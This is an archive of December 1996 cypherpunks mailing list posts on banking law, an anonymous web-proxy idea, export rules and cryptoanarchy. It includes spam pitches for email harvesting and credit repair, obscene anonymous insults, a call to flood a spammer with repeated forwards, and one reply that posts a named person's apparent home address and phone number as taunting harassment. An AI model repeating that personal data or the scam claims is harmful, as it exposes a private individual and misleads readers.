>> outside the US, under government direction, by government agents, in an 
>> entirely different legal jurisdiction, to boot!)   Seemingly, doing 
>> something at the behest of government does not immunize one.
>
>The fact that a bank complied with a federal regulation governing the 
>bank is not similar to a business selling a defective product.

Wrong.   They're not _identical_, but on the other hand it is indeed similar 
in many respects.  Remember, "complying with a federal regulation" is 
actually a misleading statement:  If _any_ leeway is allowed
in how to "comply," the organization involved is, presumably, liable for the 
exercise of that freedom.  Or, at least, they should be if the rules were 
followed.  

While admittedly this is an off-the-wall example, if a bank reported these 
transactions by sending them by car driven by a license-free 16-year old, 
and he lost control and killed a dozen people in a crowd, the fact that the 
bank "was complying with a federal regulation" wouldn't save them from hefty 
liability.  

 




Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Thu, 26 Dec 1996 14:25:15 -0800 (PST)
To: jim bell <jimbell@pacifier.com>
Subject: Re: Legality of requiring credit cards?
In-Reply-To: <199612260701.XAA25145@mail.pacifier.com>
Message-ID: <Pine.BSF.3.91.961226171959.6946B-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 25 Dec 1996, jim bell wrote:

> At 12:31 AM 12/26/96 -0500, Brian Davis wrote:
> 
> I would argue that if the bank can be forced to help the government enforce 
> the law, the bank should also become liable for damage done as a consequence 
> of complying with such requirements.  While it's a different area, within 
> the last few years a decision was made (SC?) that companies which had made 
> Agent Orange for the US Government during Vietnam can be held liable 
> (without recourse against the government, apparently) for the damages caused 
> ex-servicemen for selling dioxin-tained Agent Orange to the government, but 
> manufactured totally according to government specifications.  (and used only 
> outside the US, under government direction, by government agents, in an 
> entirely different legal jurisdiction, to boot!)   Seemingly, doing 
> something at the behest of government does not immunize one.

The fact that a bank complied with a federal regulation governing the 
bank is not similar to a business selling a defective product.

> 
> 
> 
> > The guy is a lawyer and had 
> >previously been involved in transactions in which such reports had been 
> >filed.  What is your explanation for the three 3 $9k check request?  
> 
> I have none.  But then again, I don't have to.  Unless "guilty until proven 
> innocent" has been adopted as a standard of proof in American courts.  Do 
> you know something we don't?

Apparently I do.  And that is that juries can draw inferences and that 
lawyers can call attention to possible inferences.  His lawyer could 
argue "no harm, no foul" and the prosecutor could argue that he intended 
to violate the statute, but got caught.  The jury would've then decided 
the issue, with the government bearing the burden of proof BRD. 



> BTW, gambling pools like this are supposed to be illegal, aren't they?  
> Isn't it odd when government seems to stop enforcing laws unless it's 
> profitable to do so?  

And the State of California was free to prosecute him.  Most crimes are 
state crimes only; some have both state and federal aspects; others are 
solely federal crimes. 

EBD

> Jim Bell
> jimbell@pacifier.com
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alexander Chislenko <alexc@firefly.net>
Date: Thu, 26 Dec 1996 14:48:58 -0800 (PST)
To: cypherpunks@toad.com (Cypherpunks mailing list)
Subject: Re: IDEA: "Site Cloaking" Technology
Message-ID: <3.0.32.19961226175522.00a01230@pop.firefly.net>
MIME-Version: 1.0
Content-Type: text/plain


Anybody would care to comment on this?

At 11:43 AM 12/26/96 -0800, Chris Hind <chind@juno.com>  wrote on the
Extropian list:

>A few weeks ago, I came up with this idea for a new technique I like to
>call "Site Cloaking". It's possible to create a Perl CGI script that would
>grab a file or webpage from another site & display it for the user without
>telling the user the original location like a proxy. This way you could put
>a CGI script on your website with links to country-specific censored texts
>or webpages and not tell anyone the site locations so that they can't shut
>them down. A person could put up a so-called subversive webpage in that
>specific country and tell this proxy the address and thus protect the site
>without giving out it's real address forcing the ISPs in that country to
>scan ALL WEBPAGES on their servers making the process more difficult. You
>could put up any so-called subversive and censored information on your
>webpage and people could access them without getting shutdown because only
>the CGI script would know where the source site is and you could even
>cipher the script's site list so even the owner of the proxy website can't
>locate the sites. You could then have a website or even a web search tool
>where you'd load all these sites into and acquire even more sites because
>you'd be offering protection and the sites would stay up indefinately. If
>the FEDS get pissed, simply wipe the file and the list is gone but the
>sites remain. 
>
>A person I talked to over IRC claimed that a CGI Perl script such as this
>isn't all that difficult to do but I myself have zero experience in
>programming Perl. Perhaps someone on this list who can program in Perl can
>try it?
>
>"Some people dream about worthy accomplishments while others stay
> awake and do them."
>
>-----------------------------------------------------------------------
>Chris Hind (chind@juno.com)                    Upward, Outward, ACTION!
>NeoReality (Personal)      http://www.geocities.com/CapeCanaveral/6810/
>Ethereal Outlook (Extropian)
>http://www.geocities.com/CapeCanaveral/6810/outlook.htm
>
>

This seems complimentary to anonymous browsing (e.g., www.anonymizer.com).
I doubt that ciphering the site list can assure that the site can't
be found, as somebody could match incoming and outgoing requests.
A chain of "Anonymous Rewebbers" / Recloakers could help here.
An important thing here would be to make sure that the search engines can
still find the sites.  Other difficulties would be caching and getting
credits for ads.

Do you think it's worth doing?

---------------------------------------------------------------------------
Alexander Chislenko   Home page:  <http://www.lucifer.com/~sasha/home.html>
Firefly Website recommendations:  <http://my.yahoo.com> ---> "Firefly"
---------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 26 Dec 1996 18:11:32 -0800 (PST)
To: troubled@mailmasher.com
Subject: Re: confidential banking?
In-Reply-To: <199612262234.OAA21192@mailmasher.com>
Message-ID: <Pine.SUN.3.91.961226175230.398A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 26 Dec 1996 troubled@mailmasher.com wrote:

> I saw a posting on alt.privacy a couple of days ago from
> 100022.1345@compuserve.com (Mark Mage) advertising the
> availability of what he called "the safest kind of bank
> account legally available", something called "an anonymous
> 'Sparbuch'" account in Austria.
> ...
> I'm not at all familiar with Austrian banking law or this type
> of account.  Would someone tell me if this is worth checking
> into further?  'Mark Mage' says these accounts usually cost
> $200 - $400 to set up, but he's asking "considerably less".

The trouble with sparbuchs is that they are legally available 
only to Austrians.  The answer to this given by promoters is that
since no ID can be required of Austrians and the passbook is in
essence a bearer instrument, the law cannot be enforced.  As far
as I can tell, though, one would really need to handle one's
business through an Austrian to keep from having to answer 
embarrassing questions.  In addition, I personally would not do
business with Mark Mage.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Thu, 26 Dec 1996 18:27:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: RUL_let
Message-ID: <3.0.32.19961226182821.006b625c@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:11 PM 12/26/96 -0500, John Young wrote:
>12-24-96.
>
>"New encryption export rules probably won't be issued until early 
>next week" 
>
>   Rules probably won't be issued until just a day or 2 before they 
>   go into effect on January 1, officials said Monday.

Good move on part of the USG. It will keep public discussion to a minimum.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
   Make your mark in the history of mathematics. Use the spare cycles of
   your PC/PPC/UNIX box to help find a new prime.
   http://www.mersenne.org/prime.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sunshine@kcii.com
Date: Thu, 26 Dec 1996 15:19:26 -0800 (PST)
To: cypherpunks@toad.com
Subject: Create Prospects Daily!  Watch Your Business Explode!
Message-ID: <199612262331.SAA04391@server.kcii.com>
MIME-Version: 1.0
Content-Type: text/plain


Fuck_You_Nerds,

I thought this might interest you. 

DON'T PAY ANYBODY FOR E-MAIL NAMES!!  You can extract
your own with our software.


No matter what you are marketing, you need prospects. 
Our system can allow you to reach all the prospecst you can
handle.  And even more exciting is you don't have to BUY addresses, our software extracts
them from anywhere on the internet!!

I presently have over 400 responses in my mail folder, and every few
minutes or sooner I receive more responses. 

Find out why we are all so excited about our results. Send a blank
e-mail to star-yvonnegarcia-netcontact@nicers.com and you will have
the information sent to you.

NO PROSPECTS = NO SALES!!

Have a great day,
Yvonne Garcia

P.S.  Also FREE ELECTRONIC MARKETING TRAINING AND SUPPORT GROUP AVAILABLE.
AND FREE AUTORESPONDERS!  This is YOUR KEY to successful Internet Marketing!







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Johnson <toto@sk.sympatico.ca>
Date: Thu, 26 Dec 1996 16:56:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: [Fwd: F*$%K plaidworks.com]
Message-ID: <32C33B0D.7E86@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: message/rfc822


To: Eric Murray <ericm@lne.com>
Subject: F*$%K plaidworks.com
From: Carl Johnson <toto@sk.sympatico.ca>
Date: Thu, 26 Dec 1996 18:26:37 -0800
CC: cypherpunks.com
Organization: TOTO Enterprises
References: <199612261949.LAA07264@slack.lne.com>
Reply-To: toto@sk.sympatico.ca

Eric Murray wrote:

> While I think that his web-based list-subscription tools is neat, it's
> obvious that the potential for abuse is large.  What solutions are 
>there for protecting us from assholes like the one who signed 
>cypherpunks up to all these lists?

  I just replied to all the messages from plaidworks.com, changing the
Subject heading to FUCK PLAIDWORKS.COM.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: robroy@flinet.com
Date: Thu, 26 Dec 1996 16:06:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: Repair " YOUR OWN " Credit !
Message-ID: <199612270006.TAA21092@shell.flinet.com>
MIME-Version: 1.0
Content-Type: text/plain


CREDIT REBUILDING OF AMERICA
 * REBUILD YOUR OWN CREDIT*

PLEASE FORGIVE THIS E-MAIL INTRUSION BUT IF YOU CAN USE THIS SERVICE?   PLEASE KEEP
READING!!
                                                                                 
   Have you ever been turned down after you applied for a credit card,
department store card, or a gas credit card, or that  new car  you have 
wanted?
   The reason was probably because of something the creditor found on 
your credit report. 
   Thousands of people are denied credit every day because of something that 
appears on their credit report that  is not correct , OR they would like 
removed  from their credit report  for  good!!
    There are many companies out there that can remove tems on your credit 
report but want to charge you any where from $300.00  to  $1,000.00 .   
   BE CAREFUL, most of these companies can't do anything 
to repair your credit that you can't do yourself  with my  
"CREDIT REPAIR PACKET".
  Once I found out just how the " BIG " companies were doing this, 
I put all the information down on a  simple   twelve step process. 
     ** DO IT YOURSELF **  why pay their high prices to repair your 
credit, when you can do it yourself for only $19.95  plus 2.95  for S&H.
      I spent over two years to perfect this process, and if followed to the 
letter, it  will  work!!!
      HAVE the new car you want, the credit cards  you want.  
You don't have to wait SEVEN to TEN_YEARS for these items to be 
 taken off your credit reprot.
DO IT YOUR SELF!! and feel  GOOD AGAIN!!
Just send your check or money orker to:

 Robert C. Roy, Jr.
 P.O. Box  1052
 Delray Beach,  Fl.  33447-1052

I will send you by  return mail  the complete twelve step packet so you
can get started  RIGHT NOW!!
SEND NOW!!  due to the  unbelievable  responce for this packet
the  introductory price of $19.95 (+) $2.95 S&H,  will not last long!
HAVE A "GREAT DAY"!  &
THANK YOU FOR YOUR TIME AND ORDER!!
Timing is everything...  I'm making $2000+ per week
in MLM after only 4 weeks.  I'll train you how.  
Be 1st in your area.  Call live conference call 
Mondays 9pm Eastern Time: 1-800-000-0000.

If you like what you hear and are serious about making
money call Sandy 000-000-0000, or email you@youraddress.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Thu, 26 Dec 1996 10:19:59 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Diffie-Hellman
Message-ID: <199612261819.TAA25920@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


The only `culture' Timmy May possesses is that cultivated 
from his foreskin scrapings.

   ))))
  ))  OO  Timmy May
  6   (_)
  `____c





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Thu, 26 Dec 1996 16:31:38 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Vandalism in New York City
In-Reply-To: <sTZiZD110w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961226192725.7704A-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 25 Dec 1996, Dr.Dimitri Vulis KOTM wrote:

> Xmas day vandals overturned 75 headstones in the Calvary Cemetry in Long
> Island City, near the residence of Earthweb's associate network administator
> Ray "Arsenic" Arachelian.

Oh, I see you've been busy over the Christmas holiday.  Lemme guess, you 
were bored or sending anonymous spams about Tim and needed some physical 
excercise for once, so you left your 67-67 Burns Street #4K, Forest 
Hills NY 11375 (718) 261-6839 apartment to work out?  Or perhaps you were 
looking for a hot date?

Wheee...

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    | "If  you're  gonna die,  die  with your|./|\.
..\|/..|sunder@sundernet.com|boots on;  If you're  gonna  try,  just |/\|/\
<--*-->| ------------------ |stick around; Gonna cry? Just move along|\/|\/
../|\..| "A toast to Odin,  |you're gonna die, you're gonna die!"    |.\|/.
.+.v.+.|God of screwdrivers"|  --Iron Maiden "Die With Your Boots on"|.....
======================== http://www.sundernet.com =========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Thu, 26 Dec 1996 16:50:06 -0800 (PST)
To: cypherpunks@toad.com
Subject: Vulis strikes again?
Message-ID: <Pine.SUN.3.91.961226195134.8341A-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


wheee, looks like KOTM subscribed us to a shitload of mailing lists...  
Having fun Herr Doktor?

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    | "If  you're  gonna die,  die  with your|./|\.
..\|/..|sunder@sundernet.com|boots on;  If you're  gonna  try,  just |/\|/\
<--*-->| ------------------ |stick around; Gonna cry? Just move along|\/|\/
../|\..| "A toast to Odin,  |you're gonna die, you're gonna die!"    |.\|/.
.+.v.+.|God of screwdrivers"|  --Iron Maiden "Die With Your Boots on"|.....
======================== http://www.sundernet.com =========================

---------- Forwarded message ----------
Date: Thu, 26 Dec 1996 11:13:57 -0800
From: sharks-chat@plaidworks.com
To: cypherpunks@toad.com
Cc: list-errors@plaidworks.com
Subject: Error Condition Re: 


The mail server has identified an administrative command in your
message. DO NOT SEND ADMINISTRATIVE COMMANDS TO THE LIST. All server
commands should be sent to listproc@plaidworks.com.

If you did not intend to send an administrative command, then you'll need
to rewrite your message to avoid the command words

	 UNSUBSCRIBE

that are causing listproc to trap your message.

For help, send email to address info@plaidworks.com

-------------------------------------------------------------------------------
unsubscribe





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 26 Dec 1996 17:15:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: RUL_let
Message-ID: <1.5.4.32.19961227011159.006ccc98@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


12-24-96.

"New encryption export rules probably won't be issued until early 
next week" 

   Rules probably won't be issued until just a day or 2 before they 
   go into effect on January 1, officials said Monday. Greg Simon 
   said section of rules requiring detailed business plans from 
   encryption companies is likely to be changed.

   [Markoff wrote last week the rules were due out December 22;
   any sightings?]

-----

RUL_let  (3 kb) 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Hamilton <martin@mrrl.lut.ac.uk>
Date: Thu, 26 Dec 1996 12:16:14 -0800 (PST)
To: ssh@clinet.fi
Subject: ssh + GNU win32 = !!!
Message-ID: <199612262014.UAA06180@gizmo.lut.ac.uk>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3949.1071713655.multipart/signed"

--Boundary..3949.1071713655.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

There's a first stab at that Win32 port of ssh that I've been promising
up for FTP at: <URL:ftp://ftp.net.lut.ac.uk/martin/ssh-win32/>

It's not pretty, but it does just about work - though cf. the list of
caveats in the README.  I'll have a go at making this more of a clean
port and less of a quick hack after the New Year :-)

In the meantime, consider this: the Cygnus port of the GNU developers
tools will let you build DLLs.  And it's free, of course...  Should
make building PGP as a DLL a reasonable proposition, methinks -
<URL:http://www.cygnus.com/gnu-win32/> for more info. 

Merry Xmas!

Martin




--Boundary..3949.1071713655.multipart/signed
Content-Type: application/octet-stream; name="pgp00001.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00001.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgTUVTU0FHRS0tLS0tClZlcnNpb246IDIuNi4zaQoK
aVFDVkF3VUJNc0xjbjlaZHBYWlhUU2poQVFFVTFBUDdCN2E2V2Zjc1JlbmV3
bW5pcUwrbnVXZHhQYmJvNzlOcwpmc3BsWUUvNkJBS0t1MS9Ud2NhWnRPTktH
N3Q4OFNxdmRsYVVaL1o5bGNOKzFTR3liamRoVU0rU3F0ZDIzSUpJCnRENVZJ
ckhPR3V2R2g4RXhnZlhKaS9sZXBOeDlBOEdYaUx3eHR4QU1jWWRzVkhKY0NL
OWR2Vy8rNHM3UzJwdEwKZnhjRmlFVUljSlE9Cj1GVG1zCi0tLS0tRU5EIFBH
UCBNRVNTQUdFLS0tLS0K
--Boundary..3949.1071713655.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: troubled@mailmasher.com
Date: Thu, 26 Dec 1996 20:20:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: multiplicity
Message-ID: <199612270420.UAA10292@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain


Just great!  The first message I send to this mailing list
and somehow multiple copies of it get posted.

I honestly don't know how it happened, but I'll try to be
very careful in the future and watch for anything I might
have carelessly done which could have caused this.

Please accept humble newbie apologies.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 26 Dec 1996 21:19:23 -0800 (PST)
To: Omegaman <omega@bigeasy.com>
Subject: cryptoanarchy
In-Reply-To: <Pine.LNX.3.95.961224182704.3135A-100000@jolietjake.com>
Message-ID: <199612270519.VAA24202@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


omegaman taunts me to rant about cryptoanarchy. frankly I find
it tiresome given its originator repeatedly refuses to answer
point-blank questions about key aspects of it. lacking this, I 
fail to take it seriously, given nobody else has a similar idea.



>THESIS:The deconstruction of democracy enabled by the inevitable genesis of
>cryptoanarchy will result in a more just (fair?) society.  

actually TCM tends to avoid talking about the demise of democracy
to avoid spilling his real opinions on it, namely that it is a pile
of crap that has corrupted civilization. this from someone who likes
to wrap himself in the constitution when the issue is free speech
or something else like that.

>Brutality amongst human beings has little to do with what type of
>government (or lack thereof) we have established.

bzzzzzzt, history readily denies this.

  Nor is brutality
>inevitable amongst human beings; governments have little or no affect on how
>individuals think and behave.

bzzzzzt, history readily denies this. but again it is amusing to see
the patently incorrect assertions that cryptoanarchists embrace and
flout.

>1) Do you agree that these things are an inevitable consequence of anonymous
>untraceable payment systems?

murder, assassination, kidnapping, they all already exist. I am dubious that
the existence of anonymous payments will change much in this area. I don't
think it will become any more prevalent. what TCM seems to imply in much
of his writing, but fails to outrightly assert because he's such a weasel,
is that the world would be a *better*place* with all these
things, which I vehemently reject.

>2) Do you agree then that all it would take is just one?  Or could one alone
>be stopped or controlled?  how?

it is not so much the point that these things can happen, that I am
debating, but that they are inevitable and even something to look
forward to that I think mark TCM as a wacko.

>3) How can these bad things be prevented with an anonymous untraceable 
>payment system?

terrorism has existed for centuries, and will continue to exist. it
cannot be prevented, in a sense, and in another way, it can be 
minimized. it's not a black or white issue as feebleminded people
would like to portray it as. 

I'm in favor of anonymous cash, but
I am also in favor of social/legal mechanisms to minimize its subversive
impact. note that "not dealing with kidnappers or terrorists" is
one such approach that does not involve police.

consider this: the cash is normally anonymous, but the govt would
have the ability to "tag" it in special circumstances, such as the
way stolen money from banks may explode red ink over the culprit.

the fact that cpunks would totally reject any such reasonable compromise
I find highly repellent.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Thu, 26 Dec 1996 22:00:40 -0800 (PST)
To: Ray Arachelian <sunder@brainlink.com>
Subject: Re: Vulis strikes again?
In-Reply-To: <Pine.SUN.3.91.961226195134.8341A-100000@beast.brainlink.com>
Message-ID: <Pine.3.89.9612262137.A12346-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 26 Dec 1996, Ray Arachelian wrote:

> wheee, looks like KOTM subscribed us to a shitload of mailing lists...  
> Having fun Herr Doktor?
> 
Not only that, but he's probably posting those messages that begin with 
Fuck_You_Nerds...those appear regularly on alt.revenge, where he is a 
semi-frequent poster.  


Zach Babayco 

zachb@netcom.com <-------finger for PGP public key

If you need to know how to set up a mail filter or defend against 
emailbombs, send me a message with the words "get helpfile" (without the 
" marks) in the SUBJECT: header, *NOT THE BODY OF THE MESSAGE!*  I have 
several useful FAQs and documents available.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jessica_Jewett@efcom.wolfe.net (Jessica Jewett)
Date: Thu, 26 Dec 1996 22:34:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Ignore: S*P*A*M Bait
Message-ID: <428584959.13635319@efcom.uucp>
MIME-Version: 1.0
Content-Type: text/plain


Fuck_You_Nerds,cypherpunks@toad.com,Internet writes:
Why are you reading this?  Are you a spammer?



STOP the messages!  They're annoying!

~Jessica a.k.a Phoebe~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Shit F. Brains" <cypherpunks@toad.com>
Date: Thu, 26 Dec 1996 21:02:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Shit F. Brains
In-Reply-To: <32C37289.3C13@toad.com>
Message-ID: <32C37456.46E4@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Shit F. Brains wrote:
> 
> You don't say!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jlucas4@capital.edu (Jesse Lucas)
Date: Thu, 26 Dec 1996 20:15:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: UNIX talk and write source...
Message-ID: <9612270417.AA06960@gemini.capital.edu>
MIME-Version: 1.0
Content-Type: text/plain



Fellows,

   Anyone know if and where the source code for UNIX talk and write (or the 
equivalent Linux) commands are to be found?  Anyone have any terminal to 
terminal communication code that they've written that they wouldn't mind
parting with?  

				Jay

oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo
o  )\     _. - ._.) = Jesse Lucas - jlucas4@capital.edu  	      o 
1 /. `- '  (  `--'  : http://www.geocites.com/collegepark/7332        1
1 `- , ) -  > ) \   : "I cut off their heads and, like heaps of grain,1
o   (.' \) (.' -.   =  I piled them up." - Assyrian Ruler	      o
oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John H West <jwest@eskimo.com>
Date: Thu, 26 Dec 1996 23:31:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Repair " YOUR OWN " Credit !
In-Reply-To: <199612270006.TAA21092@shell.flinet.com>
Message-ID: <32C37B93.5DCD@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Good folks who already have too much to read:

I encourage that everyone who gets spam like that which follows 
forward the original message BACK TO THE SENDER (several times) 
demanding to know "what the hell does this have to do with 
cryptology, spammer ??" attached to the * end * of their quoted 
text.  Hopefully, the response that they receive will be 
"overwhelming" :)

If (s)he has to search through every message looking for 
"good replies," then they may be less inclined to solicit for 
such a voluminous response in the future.

john
seattle

--

robroy@flinet.com wrote:
> 
> CREDIT REBUILDING OF AMERICA
>  * REBUILD YOUR OWN CREDIT*
> 
> PLEASE FORGIVE THIS E-MAIL INTRUSION BUT IF YOU CAN USE THIS SERVICE?   PLEASE KEEP
> READING!!
> 
>    Have you ever been turned down after you applied for a credit card,
> department store card, or a gas credit card, or that  new car  you have
> wanted?
>    The reason was probably because of something the creditor found on
> your credit report.
>    Thousands of people are denied credit every day because of something that
> appears on their credit report that  is not correct , OR they would like
> removed  from their credit report  for  good!!
>     There are many companies out there that can remove tems on your credit
> report but want to charge you any where from $300.00  to  $1,000.00 .
>    BE CAREFUL, most of these companies can't do anything
> to repair your credit that you can't do yourself  with my
> "CREDIT REPAIR PACKET".
>   Once I found out just how the " BIG " companies were doing this,
> I put all the information down on a  simple   twelve step process.
>      ** DO IT YOURSELF **  why pay their high prices to repair your
> credit, when you can do it yourself for only $19.95  plus 2.95  for S&H.
>       I spent over two years to perfect this process, and if followed to the
> letter, it  will  work!!!
>       HAVE the new car you want, the credit cards  you want.
> You don't have to wait SEVEN to TEN_YEARS for these items to be
>  taken off your credit reprot.
> DO IT YOUR SELF!! and feel  GOOD AGAIN!!
> Just send your check or money orker to:
> 
>  Robert C. Roy, Jr.
>  P.O. Box  1052
>  Delray Beach,  Fl.  33447-1052
> 
> I will send you by  return mail  the complete twelve step packet so you
> can get started  RIGHT NOW!!
> SEND NOW!!  due to the  unbelievable  responce for this packet
> the  introductory price of $19.95 (+) $2.95 S&H,  will not last long!
> HAVE A "GREAT DAY"!  &
> THANK YOU FOR YOUR TIME AND ORDER!!
> Timing is everything...  I'm making $2000+ per week
> in MLM after only 4 weeks.  I'll train you how.
> Be 1st in your area.  Call live conference call
> Mondays 9pm Eastern Time: 1-800-000-0000.
> 
> If you like what you hear and are serious about making
> money call Sandy 000-000-0000, or email you@youraddress.com

-- 

        /************************************************/
        /*****   DARE:  To Keep the CIA off Drugs   *****/
        /************************************************/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Shit F. Brains" <cypherpunks@toad.com>
Date: Thu, 26 Dec 1996 21:40:41 -0800 (PST)
To: troubled@mailmasher.com
Subject: Mark Mage is a Thief
In-Reply-To: <199612262235.OAA21415@mailmasher.com>
Message-ID: <32C37D57.2AE4@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


troubled@mailmasher.com wrote:
> 
> I saw a posting on alt.privacy a couple of days ago from
> 100222.1435@compuserve.com (Mark Mage) advertising the
> availability of what he called "the safest kind of bank
> account legally available", something called "an anonymous
> 'Sparbuch'" account in Austria.

Dear Troubled,
  The guy's a fucking thief, from what I've heard.
  It seems the FBI is looking for him for a nasty number he
pulled on some retired people, ripping off their life savings.
He seems to have the IRS after him, as well.
  I'd steer clear of him.  He's bad news.

SFB





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pSIONIC dAMAGE <zerofaith@geocities.com>
Date: Thu, 26 Dec 1996 23:42:16 -0800 (PST)
To: jlucas4@capital.edu (Jesse Lucas)
Subject: Re: UNIX talk and write source...
Message-ID: <199612270741.XAA28483@geocities.com>
MIME-Version: 1.0
Content-Type: text/plain


I can check and let you know, I just got linux 4 christmas.
w/source, mostly.

>
>----------geoboundary
>
>
>
>
>Fellows,
>
>   Anyone know if and where the source code for UNIX talk and write (or the 
>equivalent Linux) commands are to be found?  Anyone have any terminal to 
>terminal communication code that they've written that they wouldn't mind
>parting with?  
>
>				Jay
>
>oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo
>o  )\     _. - ._.) = Jesse Lucas - jlucas4@capital.edu  	      o 
>1 /. `- '  (  `--'  : http://www.geocites.com/collegepark/7332        1
>1 `- , ) -  > ) \   : "I cut off their heads and, like heaps of grain,1
>o   (.' \) (.' -.   =  I piled them up." - Assyrian Ruler	      o
>oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo
>
>----------geoboundary--
>
pSIONIC dAMAGE
Zer0 Faith Inc.
www.geocities.com/SiliconValley/Heights/2608
H/P/A/V/C ANTIVIRUS/COUNTERSECURITY
"ONLY THE ELITE SURVIVE!"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Thu, 26 Dec 1996 20:44:32 -0800 (PST)
To: Cypherpunks mailing list <alexc@firefly.net>
Subject: Re: IDEA: "Site Cloaking" Technology
In-Reply-To: <3.0.32.19961226175522.00a01230@pop.firefly.net>
Message-ID: <Pine.LNX.3.95.961226232419.3600A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 26 Dec 1996, Alexander Chislenko wrote:

> This seems complimentary to anonymous browsing (e.g., www.anonymizer.com).
> I doubt that ciphering the site list can assure that the site can't
> be found, as somebody could match incoming and outgoing requests.
> A chain of "Anonymous Rewebbers" / Recloakers could help here.
> An important thing here would be to make sure that the search engines can
> still find the sites.  Other difficulties would be caching and getting
> credits for ads.
> 
> Do you think it's worth doing?

This sounds a lot like Ray Cromwell's program, "decense".  It's more or less
the web equivalent of the penet remailer.  It is possible to attack even if
requests and responses are encrypted with traffic analysis.  The main objective
of such a system would be to make it very difficult to match a "real" URL with
the "anonymous" one, but not virtually impossible.  Encrypting the site list
won't help because the key would have to be stored somewhere on the system.
Many web servers have a security hole in them where the source code for a
CGI script can be requested instead of actually executing the script.  It's
not a good idea to assume that the executable will not be readable by anyone.

Decense is available at http://www.clark.net/pub/rjc/decense.html

Mark
-- 
finger -l for PGP key
PGP encrypted mail prefered.
0xf9b22ba5 now revoked






